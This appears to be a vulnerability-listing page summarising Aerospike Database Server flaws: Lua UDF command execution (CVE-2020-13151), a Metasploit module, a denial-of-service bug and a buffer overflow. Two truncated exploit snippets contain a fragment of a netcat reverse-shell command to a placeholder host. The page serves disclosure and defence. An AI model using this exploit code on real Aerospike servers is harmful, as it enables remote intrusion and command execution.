EUVD-2016-9872

Malware in sbrugna...

Aerospike Database UDF Lua Code Execution Exploit

Aerospike Database versions before 5.1.0.3 permitted user-defined functions UDF to call the os.execute Lua function. This Metasploit module creates a UDF utilizing this function to execute arbitrary operating system commands with the privileges of the user running the Aerospike service. This modu...

Aerospike Database UDF Lua Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Aerospike Database UDF Lua Code Execution', 'Description' = %q Aerospike Database versions before 5.1.0.3 permitted user-defined functions UDF to...

Aerospike Database UDF Lua Code Execution

Aerospike Database versions before 5.1.0.3 permitted user-defined functions UDF to call the os.execute Lua function. This module creates a UDF utilising this function to execute arbitrary operating system commands with the privileges of the user running the Aerospike service. This module does not...

Aerospike Database 5.1.0.3 - OS Command Execution

Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution Date: 2020-08-01 Exploit Author: Matt S Vendor Homepage: https://www.aerospike.com/ Version: &1|nc ip port /tmp/ft&' def getclientcfg: try: return aerospike.client 'hosts': cfg.ahost, cfg.aport, 'policies': 'timeout': 8000.connect...

Aerospike Database 5.1.0.3 Remote Command Execution

Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution Date: 2020-08-01 Exploit Author: Matt S Vendor Homepage: https://www.aerospike.com/ Version: &1|nc ip port /tmp/ft&' def getclientcfg: try: return aerospike.client 'hosts': cfg.ahost, cfg.aport, 'policies': 'timeout': 8000.connect...

Exploit for OS Command Injection in Aerospike Aerospike_Server

CVE-2020-13151 POC Aerospike Database 5.1.0.3 Host Com...

Aerospike Database Server Remote Code Execution Vulnerability (CNVD-2017-02468)

Aerospike Database Server is a distributed, scalable NoSQL database from Aerospike, Inc. A remote code execution vulnerability exists in Aerospike Database Server. An attacker could use this vulnerability to execute arbitrary code in an affected application, and a failed attack could result in a...

CVE-2016-9049

An exploitable denial-of-service vulnerability exists in the fabric-worker component of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause the server process to dereference a null pointer. An attacker can simply connect to a TCP port in order to trigger this vulnerability...

Aerospike Database Server Buffer Overflow Vulnerability

Aerospike Database Server is a distributed, scalable NoSQL database from Aerospike, Inc. A stack-based buffer overflow vulnerability exists in Aerospike Database Server version 3.10.0.3. An attacker could exploit this vulnerability to execute arbitrary code in the context of an affected...